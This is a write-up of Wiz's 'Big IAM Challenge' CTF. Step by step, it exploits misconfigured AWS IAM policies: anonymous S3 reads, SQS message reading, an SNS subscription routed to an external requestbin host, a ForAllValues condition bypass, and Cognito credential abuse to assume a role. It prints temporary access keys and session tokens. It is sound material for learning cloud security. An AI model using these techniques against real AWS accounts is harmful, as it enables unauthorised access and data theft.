The The Big IAM Challenge is a cloud security Capture The Flag (CTF) event organize by Wiz with the goal of identifying and and exploiting AWS IAM misconfigurations, and learn from real-world scenarios.
Start Challenge
Level 1: Buckets of Fun
IAM Policy
Copy {
"Version" : "2012-10-17" ,
"Statement" : [
{
"Effect" : "Allow" ,
"Principal" : "*" ,
"Action" : "s3:GetObject" ,
"Resource" : "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
} ,
{
"Effect" : "Allow" ,
"Principal" : "*" ,
"Action" : "s3:ListBucket" ,
"Resource" : "arn:aws:s3:::thebigiamchallenge-storage-9979f4b" ,
"Condition" : {
"StringLike" : {
"s3:prefix" : "files/*"
}
}
}
]
}
Solve
We can see that ased on the IAM Policy, the principal "*"
is given the Allow
effect on theActions3:ListBucket and s3:GetObject
with the scope of thebigiamchallenge-storage-9979f4b
This means that any public user is able to access the bucket and download file from it
Copy aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/
2023-06-05 19:13:53 37 flag1.txt
2023-06-08 19:18:24 81889 logo.pngaws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/
aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt -
{wiz:exposed-storage-risky-as-usual}aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt -
In fact, we are able to annoymously access it, even without the preconfigured aws account on the iam challenge website.
Copy aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt - --no-sign-request
{wiz:exposed-storage-risky-as-usual}
Reference:
https://docs.aws.amazon.com/cli/latest/reference/s3/cp.html
Level 2: Google Analytics
IAM Policy
Copy {
"Version" : "2012-10-17" ,
"Statement" : [
{
"Effect" : "Allow" ,
"Principal" : "*" ,
"Action" : [
"sqs:SendMessage" ,
"sqs:ReceiveMessage"
] ,
"Resource" : "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
}
]
}
Solve
Since the challenge says it uses tthe analytics sysem on this website, I viewed page source, and managed to get the queue URL. However, we are also able to manually recreate the SQS Queue URL as we have enough information within the IAM Policy.
Copy // Initialize the Amazon Cognito credentials provider
AWS.config.region = 'us-east-1';
AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: 'us-east-1:c6f3eb2e-3cb5-404e-93bc-f0bdf7ad042e'});
// Set the region
AWS.config.update({region: 'us-east-1'});
// Create an SQS service object for Web Analytics.
// Log trafic from all users into SQS.
var sqs = new AWS.SQS({apiVersion: '2012-11-05'});
var params = {
DelaySeconds: 0,
MessageBody: JSON.stringify({"URL": document.location.href, "User-Agent": navigator.userAgent, "IsAdmin": false}),
QueueUrl: "https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2"
};
sqs.sendMessage(params, function(err, data) {
if (err) {
console.log("Error", err);
} else {
console.log("Success", data.MessageId);
}
});
Next, I try and receive-message and was able ot get the flag.
Copy aws sqs receive-message --queue-url https: //sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2
{
"Messages" : [
{
"MessageId" : "97659e07-7a6f-4feb-a1f6-c82b59c5f98b" ,
"ReceiptHandle" : "AQEBqt1TrGkiw0s9ks5CLMSvaXhrfInB3poMtpTzdS4CevOTikTEwKpGWf3IMQGlBX7S4qVIHVCX1HJQg8p+mahrsva2UBZhbPPVVCe8wfzhLUuAoo2MAyLuQRbHHlBdZ0gT0l3Zi5bTIpl1qn2/TAP9jYJXfZ
wbDEnqY1EKCjE0nTXOYzeyI3ALdAqq3Kr6L3IvlAsUZtxSExO/TKDUKtlmTi09Pawp9vAxag304lEM30sxdRY0y/rdadgrlEfo1tb218gWaZieBGftY8sYyrk0xN7YHO68C7vxIVtGUEUm8kZNNL4BRBtNvsbeOrG4zaHwuXptW0ZNK89fGchnOMfWad
X8RZ1abLdARxsvXQqH77maGPNSfrT+sH5/4ayFXkaJv8CC6eViIepOkwRq9c+d3iZl2VJev8DpNDcHRcjbUH4=" ,
"MD5OfBody" : "4cb94e2bb71dbd5de6372f7eaea5c3fd" ,
"Body" : "{\"URL\": \"https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html\", \"User-Agent\": \"Lynx/2.5329.3258dev.35046 libwww-FM/2.14 SSL-MM/1.4.3714\",
\"IsAdmin\": true}"
}
]
}
Based on the meswsage body, theres a URL, and going to the URL gives us the flag.
Copy curl https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html
{wiz:you-are-at-the-front-of-the-queue}
Flag: {wiz:you-are-at-the-front-of-the-queue}
Reference:
https://docs.aws.amazon.com/cli/latest/reference/sqs/receive-message.html
Level 3: Enable Push Notifications
IAM Policy
Copy {
"Version" : "2008-10-17" ,
"Id" : "Statement1" ,
"Statement" : [
{
"Sid" : "Statement1" ,
"Effect" : "Allow" ,
"Principal" : {
"AWS" : "*"
} ,
"Action" : "SNS:Subscribe" ,
"Resource" : "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications" ,
"Condition" : {
"StringLike" : {
"sns:Endpoint" : "*@tbic.wiz.io"
}
}
}
]
}
Based on the aws cli reference page for sns subscribe. Note that theres a wild card reference for the sns:Endpoint
allowing us to point it to any site we control as long as it ends with "@tbic.wiz.io"
Copy aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol https --notification-endpoint https://enkcp8aoixerj.x.pipedream.net/asd@tbic.wiz.io
In the requestbin output, theres a subscribe url.
Visiting the URL gives us a confirmation response that we have subscribed to the topic.
Copy < ConfirmSubscriptionResponse xmlns = "http://sns.amazonaws.com/doc/2010-03-31/" >
< ConfirmSubscriptionResult >
< SubscriptionArn >arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications:80e4c88f-2a79-4a0a-8051-bd883b77056a</ SubscriptionArn >
</ ConfirmSubscriptionResult >
< ResponseMetadata >
< RequestId >0c20196b-7331-5957-9e2c-476809be1a7a</ RequestId >
</ ResponseMetadata >
</ ConfirmSubscriptionResponse >
And we succesfully gotten the flag from our request bin.
Flag: {wiz:always-suspect-asterisks}
Reference:
https://docs.aws.amazon.com/cli/latest/reference/sns/subscribe.html
Level 4: Admin Only
IAM Policy
Copy {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
},
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
"Condition": {
"StringLike": {
"s3:prefix": "files/*"
},
"ForAllValues:StringLike": {
"aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
}
}
}
]
}
At a glance, the IAM Policy seems secure, that it scoped to only allow if the aws:PrincipalArn
is the arn of the admin account. However, the vulnerabiliy comes in the ForAllValues
which will return true if there are no context key in the requests.
We can simply run the s3 command with no-sign-requests
to ensure that the PrincipalArn
is not being sent in the request and able to retrieve the flag.
Copy > aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request
2023-06-07 19:15:43 42 flag-as-admin.txt
2023-06-08 19:20:01 81889 logo-admin.png
> aws s3 cp s3://thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt - --no-sign-request
{wiz:principal-arn-is-not-what-you-think}
Flag: {wiz:principal-arn-is-not-what-you-think}
Reference:
https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_condition_operators.html
https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-single-vs-multi-valued-context-keys.html#reference_policies_condition-multi-valued-context-keys
Level 5: Do I know you?
IAM Policy
Copy {
"Version" : "2012-10-17" ,
"Statement" : [
{
"Sid" : "VisualEditor0" ,
"Effect" : "Allow" ,
"Action" : [
"mobileanalytics:PutEvents" ,
"cognito-sync:*"
] ,
"Resource" : "*"
} ,
{
"Sid" : "VisualEditor1" ,
"Effect" : "Allow" ,
"Action" : [
"s3:GetObject" ,
"s3:ListBucket"
] ,
"Resource" : [
"arn:aws:s3:::wiz-privatefiles" ,
"arn:aws:s3:::wiz-privatefiles/*"
]
}
]
}
Recalling from previous level, there were some cognito credentials in the browser javascript. I viewed the page source and we can see something similar.
Copy AWS . config .region = 'us-east-1' ;
AWS . config .credentials = new AWS .CognitoIdentityCredentials ({IdentityPoolId : "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b" });
// Set the region
AWS . config .update ({region : 'us-east-1' });
$ (document) .ready ( function () {
var s3 = new AWS .S3 ();
params = {
Bucket : 'wiz-privatefiles' ,
Key : 'cognito1.png' ,
Expires : 60 * 60
}
signedUrl = s3 .getSignedUrl ( 'getObject' , params , function (err , url) {
$ ( '#signedImg' ) .attr ( 'src' , url);
});
});
The browser gets a cognito identity credentials from the id pool, and use it to retrieve the file cognito1.png
using s3 presigned url, which we can see in the browser source. when inspecting element.
Since the AWS.config.credentials
is being created by javascript, we can just run the browser console to retrieve the credentials.
With the credentials we are able to then access the AWS S3 bucket normally using AWS CLI.
Copy {
"AccessKeyId": "ASIARK7LBOHXOZC6UC63",
"SecretKey": "XnKcOsg32TtUbawDXNx24UDA91NnUcm8SbdtBik4",
"SessionToken": "IQoJb3JpZ2luX2VjEO7//////////wEaCXVzLWVhc3QtMSJIMEYCIQCyIRjUgrnBcZgXvvb3Pd36y5K79sRmxYXk9uOytJ2ZNgIhAPbBI8HURFpwF+9OIkjldiQ6B27KtRT5k9yzT4m3CM6XKskFCHYQABoMMDkyMjk3ODUxMzc0IgygwcuHwXUiG/4Az3UqpgVJrklNqZm09uSXrroAQ4ZS0+Cn4wH1pQYDdQ1AMtDExbROvVnnWJyFvdgZceUa6dP8QiL6m128BzqxXUNUjOM2CFO9N3R9KO8FLMxm0flqYbgZhrVlnuqTHztLmvowzagk2dKTE03vAtFL+1FWhETuM5TgoKtQeY8OUBQrEDDTlhvz03hFRF6muF2Mx1e1e1NJtK1VuQYEs/7OOCUMiEgXnAGENZKJgbaW+g168wXudYOH1L7Qt1bQePmqsu1Fx8AMDklLfMwcPqPWQPBAMTodEUIWA77pKHB8pqjNQEW0HDRJp2KzfvbkdpRWvU6ALIhu1pcNLM1O4TisdoCNdcppbolo+Iv4QgspButBpWfjAc1FzHI6WMDIIy3xoaWuc21k+CaVpBNpYnIGzZny6amI2cE7GddR6LSL9dhCXSE6DukvYVGr9YmXYnFqJFH3nsCRU+sG14URYoHsWPKfS9/gxHjT1G0IdQ6ehdUrE4XMSwHL92p0nIdrBhJz3ZwnHKiYePT92KEP9nKGQj8X2EW2YteWpzmPh+roVsqqxrJFFsucCQ19oPZx0iI3NKmgjweSvK94Hh6WKjPYzsKZwguhRo3WKRH7RfEliRat+KYN4jtlHeBMY/PYWtO+XohvBMPyjihAOan38d+D/NWiSfRzGtxHhaVwcB3Ls6YPd6fk1nOdTlAH8NcgOJ+cJM4oQGVRrgjtMdftrFNrLZhIIL666WyWXDt1yPb9sUj8v8dA8VRHq10+6aC4s2+3vTRYQYGnmrU7+DRZQURM1ZdEd6DoACrOsdX7kT6qXtnvBNl9apoFdXEgp5Qkqfxy9/Km+mvYZbowJAtqEv2LYrO+PE1wx+VE58Nmm/OQhHHsprb37mDNSlqBaLrg4wmyisW4REqV/pIBjxYw9YGmrAY63AJt9jE+06aJVTloN+lhDGH2nG5HJmPeDt2zebkK4DKNK8NKugfapAmYXYghTvbDffbC/4Zo3OQ8y0zNanbay/OfgQFvOFhhNku/R6/iE2s4gpoGLBfHVkGdSFbAdfZiWqbVWfqUWOxgZMRyGlwFZhLvrD03sSH7m1+GVlHoioC8i1Cm9GO8sp0kVN+8Dqzu4qOQ6QLvHWH7tax872RWaWI2lX56OY9cvHXCqe2NveVaOF8vNdDWGb/iNsJWGnJ8j8rrqkT3n/ZjwHUknBefr6xpuhaMh4QQCvn8VofSTcJUCNZQSpZEtkBqfiKAza5XDo3UC940/8BiX0XoDTjse7lXyMhqG0I+v+pLjv4Ue5IsbLV20P+3dQZKSPF4b+EuGKkuyF5C1PfpsqMy8wYEVVPLtGW0Zugc0TXeCZ8Jr1vd9hzzwbqV7AKGJ2SApD2aYQO1NQrBbgTV3Gx0N8U=",
"Expiration": "2023-12-25T14:17:41.000Z"
}
I tried to run aws configure
to configure the account, but as we are in a read only file system, I was not able to create the .aws/credentials
file. So I just exported them to environment variable, and tried to retrieve the flag
Copy > export aws_access_key_id="ASIARK7LBOHXOZC6UC63"
> export aws_secret_access_key=XnKcOsg32TtUbawDXNx24UDA91NnUcm8SbdtBik4
> export aws_session_token="IQoJb3JpZ2luX2VjEO7//////////wEaCXVzLWVhc3QtMSJIMEYCIQCyIRjUgrnBcZgXvvb3Pd36y5K79sRmxYXk9uOytJ2ZNgIhAPbBI8HURFpwF+9OIkjldiQ6B27KtRT5k9yzT4m3CM6XKskFCHYQABoMMDkyMjk3ODUxMzc0IgygwcuHwXUiG/4Az3UqpgVJrklNqZm09uSXrroAQ4ZS0+Cn4wH1pQYDdQ1AMtDExbROvVnnWJyFvdgZceUa6dP8QiL6m128BzqxXUNUjOM2CFO9N3R9KO8FLMxm0flqYbgZhrVlnuqTHztLmvowzagk2dKTE03vAtFL+1FWhETuM5TgoKtQeY8OUBQrEDDTlhvz03hFRF6muF2Mx1e1e1NJtK1VuQYEs/7OOCUMiEgXnAGENZKJgbaW+g168wXudYOH1L7Qt1bQePmqsu1Fx8AMDklLfMwcPqPWQPBAMTodEUIWA77pKHB8pqjNQEW0HDRJp2KzfvbkdpRWvU6ALIhu1pcNLM1O4TisdoCNdcppbolo+Iv4QgspButBpWfjAc1FzHI6WMDIIy3xoaWuc21k+CaVpBNpYnIGzZny6amI2cE7GddR6LSL9dhCXSE6DukvYVGr9YmXYnFqJFH3nsCRU+sG14URYoHsWPKfS9/gxHjT1G0IdQ6ehdUrE4XMSwHL92p0nIdrBhJz3ZwnHKiYePT92KEP9nKGQj8X2EW2YteWpzmPh+roVsqqxrJFFsucCQ19oPZx0iI3NKmgjweSvK94Hh6WKjPYzsKZwguhRo3WKRH7RfEliRat+KYN4jtlHeBMY/PYWtO+XohvBMPyjihAOan38d+D/NWiSfRzGtxHhaVwcB3Ls6YPd6fk1nOdTlAH8NcgOJ+cJM4oQGVRrgjtMdftrFNrLZhIIL666WyWXDt1yPb9sUj8v8dA8VRHq10+6aC4s2+3vTRYQYGnmrU7+DRZQURM1ZdEd6DoACrOsdX7kT6qXtnvBNl9apoFdXEgp5Qkqfxy9/Km+mvYZbowJAtqEv2LYrO+PE1wx+VE58Nmm/OQhHHsprb37mDNSlqBaLrg4wmyisW4REqV/pIBjxYw9YGmrAY63AJt9jE+06aJVTloN+lhDGH2nG5HJmPeDt2zebkK4DKNK8NKugfapAmYXYghTvbDffbC/4Zo3OQ8y0zNanbay/OfgQFvOFhhNku/R6/iE2s4gpoGLBfHVkGdSFbAdfZiWqbVWfqUWOxgZMRyGlwFZhLvrD03sSH7m1+GVlHoioC8i1Cm9GO8sp0kVN+8Dqzu4qOQ6QLvHWH7tax872RWaWI2lX56OY9cvHXCqe2NveVaOF8vNdDWGb/iNsJWGnJ8j8rrqkT3n/ZjwHUknBefr6xpuhaMh4QQCvn8VofSTcJUCNZQSpZEtkBqfiKAza5XDo3UC940/8BiX0XoDTjse7lXyMhqG0I+v+pLjv4Ue5IsbLV20P+3dQZKSPF4b+EuGKkuyF5C1PfpsqMy8wYEVVPLtGW0Zugc0TXeCZ8Jr1vd9hzzwbqV7AKGJ2SApD2aYQO1NQrBbgTV3Gx0N8U="
However, when runnning env
we can clearly see that the session token wasnt being modified.
So lets spin up a virtual machine and use it to get the flag.
Copy aws configure --profile level5
AWS Access Key ID [None]: ASIARK7LBOHXOZC6UC63
AWS Secret Access Key [None]: XnKcOsg32TtUbawDXNx24UDA91NnUcm8SbdtBik4
Default region name [None]:
Default output format [None]: us-west-1
aws s3 ls s3://wiz-privatefiles --profile level5
2023-06-06 03:42:27 4220 cognito1.png
2023-06-05 21:28:35 37 flag1.txt
aws s3 cp s3://wiz-privatefiles/flag1.txt - --profile level5
{wiz:incognito-is-always-suspicious}
Flag: {wiz:incognito-is-always-suspicious}
Level 6: One final push
IAM Policy
Copy {
"Version" : "2012-10-17" ,
"Statement" : [
{
"Effect" : "Allow" ,
"Principal" : {
"Federated" : "cognito-identity.amazonaws.com"
} ,
"Action" : "sts:AssumeRoleWithWebIdentity" ,
"Condition" : {
"StringEquals" : {
"cognito-identity.amazonaws.com:aud" : "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}
}
}
]
}
First, lets figure out what Cognito Identitty really does, as I cheesed level 5 with the credentials from the browser javascript console.
Cognito Federated Identities allow scoped temporary credentials to untrusted environment. Doing further research
First, we will need to get the cognito id, based on the identity-pool-id
which is given in the IAM Policy with the aws get-id
commands.
Copy aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
{
"IdentityId": "us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958"
}
With the IdentityId
we are then able to get a set of credentials to use. What we doing here is what the JavaScript code at Level5 does.
Copy aws cognito-identity get-credentials-for-identity --identity-id us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958 --region us-east-1
{
"IdentityId": "us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958",
"Credentials": {
"AccessKeyId": "ASIARK7LBOHXMQM5YB74",
"SecretKey": "r2RYZLdvtX3x88t/OJLScFeyKtJtqMECwTzrhlIT",
"SessionToken": "IQoJb3JpZ2luX2VjEO7//////////wEaCXVzLWVhc3QtMSJHMEUCIA5nWZcHrI9vtOsT+Hmuk5LwKbSRsbfUsYegGkqD5dGgAiEA8Zh3CHqRHTmLqZbB7rkrAWUvNoZ9imytigShi/h4V0sqyQUIdxAAGgwwOTIyOTc4NTEzNzQiDLgKYDNiCTAAA6B6sSqmBZLtfuLVSd5jAzr9qxANPiYziD3rdq6Gp4P0a/o6hrFvrjNgiDEUxsiml5t+f5/NYAJ29ML5L/EPSgb6sONJEFlio5+FSvIK7/Er2NDMsJfM0cmRLh3nF5Qh/xwAZYHiarIh5FVYHp5cPcx49A5ZVPv++eCP5tjQcfYh+KBf5FuphRp5Qtk7eOxkfApg4PIpu8VYBDffBaR81hQbhr7SQzigWCFwLokPNALJeV2rY5njQSP54nQcQbv/fEBPYb4dZR0Qu1uEOZAkfuRTLetBObnQ1hiSPJFI9om7VFe9Px5UfY5m6VaydJGYvDphe8mmcIzkABlprq4IKlj9mWf09oB8HCbO50vvI+y1kR0IklcXIt96iGqNy3lanxKrbLisDfPhDX2NFjUB0JaUext+HsyEcegHecrDlNYgxSVxsRwl7/4o/2lV6iUT237N4JHS8tUrftD8Gxt7jDYa8OmeKyIeViPGAUldTMXAc7mUgptxpLA3KC7kGtVbOtWF4lWzZq0lS36sOC48erfNzFmpynaYLJs8+El+hHCoWDnp1pDvJ4JA8RMOEVtTYc1v63ruXnP4XXu/kRme2ordTFxS7NrOr663lJN9rXpI2ZWz4KXl5iXfcOTGuyK5sXNEzQCvgz39JCMfVsVfnUOsNPf6Z/VfNbIzoo7aJ54nobduO0gohzZ+ERtuVj05FFbJZrTVu8l0peTmHe5QCfL/30D8zCZ7cFjRYPrugl2MmzND2tYQYNfOt4Jw88rESn07waB9irryKq5oKKyIp2yNii3kTwODldWm+KYVVx7pDjrpBj7a5u4By0EujiITJJSMie2dwoV/FjzdaIXOthT6tVF48BAODSR+2TCxPnGt6qqKwopWRUeqqwkBMiX7tNYoO6KL5ymdEqJ+eTC3jKasBjrdAs6AFV1JepywRjAWyHFgD43kIy/G/3PuvCmim63frO73SfmhJbke7/CyzrM0bKFIILPgHoeGAtealkI7NrHm8FT2onqMQB7hZGtday97r1Qb9mJlzgfv7HMJtnZRvBb0QvAh61uXHwf1181CJpuPojTLEs+HwHzvQaiU2dIh+ZwcKolx/5tAb+ayc3yUrDL5Smb3sU54FaFaDEvlZMZtNb870AVpG1PWwvEY6cpfc+FusjQT992Xh8gxX1oESATikYrkfTa+WID6ogPeUJdY/exTb1V3dEUa1/FqxDTe82/qWKnU5pKZXbDLujsdWBvmFqopTR7Tg1Rd3/+noVs+x5MPeAqvrAsaZ6vdpKdX3wKZlwfjpymMWqiZhh+JUVW8+qzC13i6u16zs3Xyhz2K2r8SXqMd/YdMLTGHjRfTC+e/H7FTTAzUEFQsae3V+bVSTMjEpcOKyISjyq50C58=",
"Expiration": "2023-12-25T22:40:07+08:00"
}
}
Now, we just need to asssume the role and get the flag. However, we need an OAuth 2.0 or OCID token to run the assume-role-with-web-identity
command. Doing further enumeration shows the aws cognito-identity get-open-id-token
commands which returns a OpenID Token.
Copy aws cognito-identity get-open-id-token --identity-id us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958 --region us-east-1
{
"IdentityId": "us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958",
"Token": "eyJraWQiOiJ1cy1lYXN0LTE0IiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6NDQ0Y2YzYzUtYjdjMS00ZjA1LTlmZTAtOWM0NDUwY2NkOTU4IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3MDM1MTMxNTMsImlhdCI6MTcwMzUxMjU1M30.H_F1noIBphPlyJzTEDrlrNu0DBQuZ1LppAwHis-Wglpc8essRw3QL-OjTQhdD50u2ziizdK9jvjvsOc5lTIHoih8tooIdGTMZipgUPHLwIEqXyMEdQwkMV4FgPY4igPCoBGTcZykaUoOopCy6sQAf2X0AqCItKrgKZiPPxgeTlpGugLdc6Ygsji3IVi0DIGpJR78aOEnRuY9KpEp6iq-0G0s0Fc6PFw8UxHukS65WUD0-avGoFgAqIUWb_lBo0zT23LmcuAKefykH4B13-EzSzPTjDYcpgHMI8or--6ffRZ4UuQ7czvX_BZ6fR8U0V5XqkaLV7yhoj4Pk8QRtJ-Qrw"
}
Now, we just need to assume the roie with the OpenID Token..
Copy TOKEN=$(aws cognito-identity get-open-id-token --identity-id us-east -1 : 444 cf 3 c 5 -b 7 c 1-4 f 05-9 fe 0-9 c 4450 ccd 958 --region us-east -1 | jq '.Token' | tr -d ' "')
aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name something --web-identity-token $TOKEN
{
" Credentials ": {
" AccessKeyId ": " ASIARK 7 LBOHXFJ 65 BTNL ",
" SecretAccessKey ": " t 9 uP 1 qLE 5 SKGRLCOrr 9 S 45 kUWY 7 +sjfZLpxSbRHE ",
"SessionToken": "FwoGZXIvYXdzEP///////////wEaDF0vM/GAyYNw3JzReyKhAgxxe0izuWhGTIjRgNzJz90wI52Gw+uv9GukhScmTU5Zz8BZCznhAxkRxkMoAL6jgZ8Q7V3NhWYYOyLlrY825Q+eb8PdsEa+6YDdGaf05oSCiVEKh/sOKbpduW/3lAbyEToePau1ovWnh62e9pZiSB0Ifxuwe9XTtfYweUJUGCG6614XVgILpbxrE/6iV9l/73YYodu2b2ElwlCeKyYxoUiB0EK+8K6Wi0hxpmwVclLW0CqzQSCY8GAWfod0dwXDWJi86R779ufmsV6PQYMBq+4ajZotdbt4kh2B9Qo8uKfdJlG+Cwf7ooFEKuizhsOWYfPKnMUUGlg8DggH5uqgpfAs166kY//a7fIAnOOV29/m7ZDZNPkv9Szt4i9zNSRTDPwokpamrAYylgHJ9GZhFKCt+St+TwNla9IiXVJCYlytmio3HNVdwXnVKoRTc6NZg+NC2wz1RicZ1xmQVSuFCq+alAnd7Z3Uej1j02xSDi3uLEmvjxo+3sh7G8r16/Pnsmrs8iIVxUXHbVW1ugMLCvQWCa6yT1+4p4+bNnQ29n+nolBhKW8Po9Nvv/XaqGGVV6By8yxkvAYZu0Mdc536B1g=",
" Expiration ": " 2023-12-25 T 15 : 00 : 50 + 00 : 00 "
},
" SubjectFromWebIdentityToken ": " us-east -1 : 444 cf 3 c 5 -b 7 c 1-4 f 05-9 fe 0-9 c 4450 ccd 958 ",
" AssumedRoleUser ": {
" AssumedRoleId ": " AROARK 7 LBOHXASFTNOIZG:something ",
" Arn ": " arn:aws:sts:: 092297851374 :assumed-role/Cognito_s 3 accessAuth_Role/something "
},
" Provider ": " cognito-identity.amazonaws.com ",
" Audience ": " us-east -1 :b 73 cb 2 d 2-0 d 00-4e77-8e80 -f 99 d 9 c 13 da 3 b "
}
Now with the assumed role credentials, we are able to then authenticate and get the flag.
Copy aws s3 ls --profile level6
2023-06-05 01:07:29 tbic-wiz-analytics-bucket-b44867f
2023-06-05 21:07:44 thebigiamchallenge-admin-storage-abf1321
2023-06-05 00:31:02 thebigiamchallenge-storage-9979f4b
2023-06-05 21:28:31 wiz-privatefiles
2023-06-05 21:28:31 wiz-privatefiles-x1000
aws s3 ls s3://wiz-privatefiles-x1000 --profile level6
2023-06-06 03:42:27 4220 cognito2.png
2023-06-05 21:28:35 40 flag2.txt
aws s3 cp s3://wiz-privatefiles-x1000/flag2.txt - --profile level6
{wiz:open-sesame-or-shell-i-say-openid}
Reference:
https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/
https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/get-id.html
https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/get-credentials-for-identity.html
https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html